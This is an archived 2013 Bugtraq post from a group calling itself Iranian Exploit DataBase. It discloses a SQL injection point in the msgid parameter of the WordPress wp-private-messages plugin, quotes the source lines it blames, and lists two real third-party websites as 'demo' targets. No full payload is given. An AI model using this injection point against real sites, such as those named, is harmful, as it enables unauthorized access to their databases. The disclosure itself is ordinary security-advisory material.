lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <201306291502.r5TF2b2t006435@sf01web1.securityfocus.com>
Date: Sat, 29 Jun 2013 15:02:37 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Wordpress wp-private-messages Plugin Sql Injection vulnerability

The Wordpress wp-private-messages Plugin suffers from a Sql Injection vulnerability.



#################################

#                        Iranian Exploit DataBase

#                          Www.exploit.IrIsT.Ir

#################################

# Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Home : http://exploit.IrIsT.Ir

# Software Link : http://wordpress.org/plugins/wp-private-messages/

# Security Risk : High

# Tested on : Linux

#################################

# Exploit :

# http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

# Dem0 :

# http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

# http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

#################################

# Vuln Source C0de : 

#  Lin 145 :

#  $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");

#  And Lin 160 :

#  echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";

#################################

# Exploit Archive : http://exploit.irist.ir/exploits-148.html

#################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ